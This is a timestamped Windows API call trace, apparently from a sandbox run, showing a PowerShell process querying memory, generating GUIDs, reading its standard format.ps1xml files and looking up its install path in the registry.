	[0088.861] VirtualQuery (in: lpAddress=0x14d1e0, lpBuffer=0x14e1e0, dwLength=0x1c | out: lpBuffer=0x14e1e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.861] VirtualQuery (in: lpAddress=0x14d1e0, lpBuffer=0x14e1e0, dwLength=0x1c | out: lpBuffer=0x14e1e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.862] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x276a6189, Data2=0x6a81, Data3=0x4f8a, Data4=([0]=0xa5, [1]=0xd6, [2]=0x29, [3]=0x7, [4]=0xf4, [5]=0x5, [6]=0x1a, [7]=0x27))) returned 0x0
	[0088.862] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x6f3ffb7a, Data2=0xbc69, Data3=0x4d5b, Data4=([0]=0x82, [1]=0xa7, [2]=0x47, [3]=0x49, [4]=0x2d, [5]=0x92, [6]=0x5f, [7]=0x79))) returned 0x0
	[0088.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.862] GetLastError () returned 0x57
	[0088.862] SetErrorMode (uMode=0x1) returned 0x1
	[0088.862] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0088.862] GetLastError () returned 0x0
	[0088.862] GetFileType (hFile=0x29c) returned 0x1
	[0088.862] SetErrorMode (uMode=0x1) returned 0x1
	[0088.862] GetFileType (hFile=0x29c) returned 0x1
	[0088.862] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.863] GetLastError () returned 0x0
	[0088.864] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.864] GetLastError () returned 0x0
	[0088.864] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.865] GetLastError () returned 0x0
	[0088.865] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.865] GetLastError () returned 0x0
	[0088.866] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.866] GetLastError () returned 0x0
	[0088.866] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.866] GetLastError () returned 0x0
	[0088.866] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.866] GetLastError () returned 0x0
	[0088.866] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.866] GetLastError () returned 0x0
	[0088.867] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.867] GetLastError () returned 0x0
	[0088.868] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.868] GetLastError () returned 0x0
	[0088.868] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.868] GetLastError () returned 0x0
	[0088.868] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.868] GetLastError () returned 0x0
	[0088.868] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.868] GetLastError () returned 0x0
	[0088.868] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.868] GetLastError () returned 0x0
	[0088.869] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.869] GetLastError () returned 0x0
	[0088.869] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.869] GetLastError () returned 0x0
	[0088.871] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.871] GetLastError () returned 0x0
	[0088.871] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0xbce, lpOverlapped=0x0) returned 1
	[0088.871] GetLastError () returned 0x0
	[0088.872] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8462, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8462*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.872] GetLastError () returned 0x0
	[0088.872] ReadFile (in: hFile=0x29c, lpBuffer=0x17c8cf4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17c8cf4*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.872] GetLastError () returned 0x0
	[0088.872] CloseHandle (hObject=0x29c) returned 1
	[0088.872] GetLastError () returned 0x0
	[0088.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.872] GetLastError () returned 0x0
	[0088.872] SetErrorMode (uMode=0x1) returned 0x1
	[0088.872] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x17e9cf0 | out: lpFileInformation=0x17e9cf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0088.872] GetLastError () returned 0x0
	[0088.872] SetErrorMode (uMode=0x1) returned 0x1
	[0088.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.872] GetLastError () returned 0x0
	[0088.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.873] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.873] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.873] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.873] GetLastError () returned 0x0
	[0088.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.873] GetLastError () returned 0x0
	[0088.877] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x79fb8cc1, Data2=0x9331, Data3=0x4a18, Data4=([0]=0xb3, [1]=0xde, [2]=0x49, [3]=0xdd, [4]=0x95, [5]=0x7, [6]=0x8f, [7]=0xb))) returned 0x0
	[0088.877] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x7d22867a, Data2=0x2c2e, Data3=0x4fce, Data4=([0]=0x93, [1]=0xb6, [2]=0xfc, [3]=0x29, [4]=0xca, [5]=0x2b, [6]=0x15, [7]=0xe6))) returned 0x0
	[0088.877] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x8c70d269, Data2=0x118, Data3=0x4bc6, Data4=([0]=0x9b, [1]=0x79, [2]=0x0, [3]=0x80, [4]=0xf9, [5]=0x0, [6]=0x26, [7]=0x68))) returned 0x0
	[0088.878] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x13a2fed7, Data2=0xa314, Data3=0x4e5c, Data4=([0]=0x97, [1]=0xcf, [2]=0x9e, [3]=0x26, [4]=0xd1, [5]=0x50, [6]=0xb1, [7]=0x83))) returned 0x0
	[0088.878] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x52906870, Data2=0xde2f, Data3=0x43d0, Data4=([0]=0x95, [1]=0xd5, [2]=0xe6, [3]=0x93, [4]=0x43, [5]=0xf6, [6]=0xd7, [7]=0x43))) returned 0x0
	[0088.878] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x3bb59c0d, Data2=0x3b3d, Data3=0x4cc7, Data4=([0]=0xab, [1]=0x62, [2]=0xfc, [3]=0xab, [4]=0xe4, [5]=0xed, [6]=0xec, [7]=0x3))) returned 0x0
	[0088.878] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.878] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd9ac44db, Data2=0xf389, Data3=0x4503, Data4=([0]=0x98, [1]=0xbd, [2]=0x29, [3]=0x23, [4]=0x7, [5]=0x4a, [6]=0xfd, [7]=0xf6))) returned 0x0
	[0088.878] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.879] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.879] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x96003b4e, Data2=0x90a0, Data3=0x4955, Data4=([0]=0x92, [1]=0x1a, [2]=0xcb, [3]=0x92, [4]=0xd3, [5]=0x46, [6]=0x7c, [7]=0xc0))) returned 0x0
	[0088.879] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x6ef1fa3f, Data2=0xffbf, Data3=0x458e, Data4=([0]=0x95, [1]=0x87, [2]=0x92, [3]=0x6c, [4]=0x19, [5]=0x1c, [6]=0xbc, [7]=0xc5))) returned 0x0
	[0088.879] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xaece9ff5, Data2=0x9c25, Data3=0x4f6d, Data4=([0]=0xaa, [1]=0x8a, [2]=0x9e, [3]=0xf9, [4]=0x7e, [5]=0xc7, [6]=0x9, [7]=0x45))) returned 0x0
	[0088.879] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x4343904f, Data2=0xe6f3, Data3=0x4bab, Data4=([0]=0x88, [1]=0x93, [2]=0xab, [3]=0x1, [4]=0xfe, [5]=0xdc, [6]=0xf, [7]=0xcf))) returned 0x0
	[0088.880] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.880] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf6dac6cf, Data2=0x117c, Data3=0x4226, Data4=([0]=0xa0, [1]=0xba, [2]=0x66, [3]=0x6b, [4]=0xdf, [5]=0xde, [6]=0xb7, [7]=0xa8))) returned 0x0
	[0088.880] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.880] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.881] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.881] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.881] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.882] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x2da71460, Data2=0x3ee6, Data3=0x416e, Data4=([0]=0xb7, [1]=0x96, [2]=0x4d, [3]=0x5, [4]=0xe6, [5]=0x13, [6]=0x7d, [7]=0x2f))) returned 0x0
	[0088.882] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x5394953, Data2=0xa536, Data3=0x49a3, Data4=([0]=0x85, [1]=0x6a, [2]=0xba, [3]=0x85, [4]=0xb7, [5]=0xaf, [6]=0xb9, [7]=0x41))) returned 0x0
	[0088.882] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xcf6d034b, Data2=0xac30, Data3=0x4c3e, Data4=([0]=0x91, [1]=0x2a, [2]=0xab, [3]=0xf9, [4]=0xab, [5]=0xae, [6]=0x5e, [7]=0x8))) returned 0x0
	[0088.882] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x870e5730, Data2=0xb0ed, Data3=0x4939, Data4=([0]=0x9a, [1]=0x2b, [2]=0x1, [3]=0x64, [4]=0xbf, [5]=0xcf, [6]=0xf8, [7]=0x25))) returned 0x0
	[0088.882] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xb27694d0, Data2=0xeed7, Data3=0x4033, Data4=([0]=0xb7, [1]=0x5d, [2]=0x83, [3]=0x81, [4]=0x4b, [5]=0x7d, [6]=0xbc, [7]=0xd2))) returned 0x0
	[0088.882] VirtualQuery (in: lpAddress=0x14d614, lpBuffer=0x14e614, dwLength=0x1c | out: lpBuffer=0x14e614*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.883] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xbcffe3ff, Data2=0xc541, Data3=0x438b, Data4=([0]=0x87, [1]=0x9, [2]=0xa9, [3]=0x4c, [4]=0xb6, [5]=0x70, [6]=0x3c, [7]=0xd8))) returned 0x0
	[0088.883] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x32bc3b3, Data2=0x8d37, Data3=0x4b85, Data4=([0]=0xac, [1]=0xfb, [2]=0x72, [3]=0xfe, [4]=0x23, [5]=0xcc, [6]=0x21, [7]=0x9c))) returned 0x0
	[0088.883] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf40f4779, Data2=0xa279, Data3=0x49ac, Data4=([0]=0xa5, [1]=0x4f, [2]=0x1c, [3]=0xfd, [4]=0x23, [5]=0x1b, [6]=0xda, [7]=0xf1))) returned 0x0
	[0088.883] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x798e8d89, Data2=0x8497, Data3=0x44dc, Data4=([0]=0xaf, [1]=0xd9, [2]=0xa4, [3]=0xfc, [4]=0x1b, [5]=0xbf, [6]=0xb8, [7]=0xbd))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xdfa5ef51, Data2=0x16a9, Data3=0x491c, Data4=([0]=0x97, [1]=0x86, [2]=0x94, [3]=0x12, [4]=0x0, [5]=0xd3, [6]=0x56, [7]=0x3d))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x67fead8c, Data2=0xf282, Data3=0x41ff, Data4=([0]=0xa8, [1]=0x7d, [2]=0xc3, [3]=0xd5, [4]=0x37, [5]=0x7e, [6]=0x88, [7]=0xf6))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xb3b4472d, Data2=0x6fd4, Data3=0x42fc, Data4=([0]=0x9f, [1]=0x73, [2]=0x13, [3]=0xd9, [4]=0x3a, [5]=0x49, [6]=0xa5, [7]=0xf5))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xe13b75a, Data2=0xe586, Data3=0x41c5, Data4=([0]=0xa3, [1]=0xd4, [2]=0x43, [3]=0x37, [4]=0xea, [5]=0xde, [6]=0x93, [7]=0x15))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x38f09316, Data2=0xb6df, Data3=0x4751, Data4=([0]=0xae, [1]=0xb9, [2]=0x34, [3]=0x6a, [4]=0x74, [5]=0x21, [6]=0x13, [7]=0x71))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x69a296d, Data2=0x431a, Data3=0x491e, Data4=([0]=0xa9, [1]=0x18, [2]=0x8e, [3]=0x1c, [4]=0xc1, [5]=0xb6, [6]=0x21, [7]=0x9b))) returned 0x0
	[0088.884] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x76e98684, Data2=0x3f57, Data3=0x4a6f, Data4=([0]=0xae, [1]=0x92, [2]=0x16, [3]=0x1, [4]=0xad, [5]=0xde, [6]=0x8a, [7]=0x3))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x530c8089, Data2=0x2d2a, Data3=0x4279, Data4=([0]=0xbd, [1]=0x71, [2]=0x3d, [3]=0xec, [4]=0xdb, [5]=0xed, [6]=0x1, [7]=0x7d))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x26d35285, Data2=0xc613, Data3=0x46b5, Data4=([0]=0x89, [1]=0x3c, [2]=0x94, [3]=0x86, [4]=0x1d, [5]=0x75, [6]=0xb0, [7]=0xb0))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1d6abf77, Data2=0xa691, Data3=0x40dc, Data4=([0]=0xa6, [1]=0x19, [2]=0x38, [3]=0xa5, [4]=0x50, [5]=0xd8, [6]=0x2c, [7]=0x1))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x2f0a4ca5, Data2=0x3c34, Data3=0x4665, Data4=([0]=0xab, [1]=0x17, [2]=0x9a, [3]=0x41, [4]=0xb0, [5]=0x5a, [6]=0x2d, [7]=0x41))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x643b36e3, Data2=0xe01c, Data3=0x4d4c, Data4=([0]=0xaf, [1]=0x3f, [2]=0xbf, [3]=0xbe, [4]=0x73, [5]=0x17, [6]=0x4b, [7]=0xc4))) returned 0x0
	[0088.885] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf0815c2, Data2=0xa6a, Data3=0x4a2f, Data4=([0]=0x8d, [1]=0xb8, [2]=0xb5, [3]=0x34, [4]=0x8c, [5]=0x26, [6]=0xa2, [7]=0xc1))) returned 0x0
	[0088.886] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf6faad94, Data2=0xf211, Data3=0x49ea, Data4=([0]=0xac, [1]=0xc, [2]=0x1d, [3]=0xb8, [4]=0x8a, [5]=0xe, [6]=0xc9, [7]=0x1c))) returned 0x0
	[0088.886] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x859c0984, Data2=0x193a, Data3=0x4c04, Data4=([0]=0xb6, [1]=0x58, [2]=0x71, [3]=0x11, [4]=0x68, [5]=0x58, [6]=0x49, [7]=0xb2))) returned 0x0
	[0088.886] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.886] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.887] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.888] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x10a70c54, Data2=0x9515, Data3=0x4316, Data4=([0]=0xa0, [1]=0xce, [2]=0xc6, [3]=0x4d, [4]=0xf9, [5]=0xbd, [6]=0xac, [7]=0x8f))) returned 0x0
	[0088.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.889] GetLastError () returned 0x0
	[0088.889] SetErrorMode (uMode=0x1) returned 0x1
	[0088.889] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0088.889] GetLastError () returned 0x0
	[0088.889] GetFileType (hFile=0x29c) returned 0x1
	[0088.889] SetErrorMode (uMode=0x1) returned 0x1
	[0088.889] GetFileType (hFile=0x29c) returned 0x1
	[0088.889] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.890] GetLastError () returned 0x0
	[0088.891] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.891] GetLastError () returned 0x0
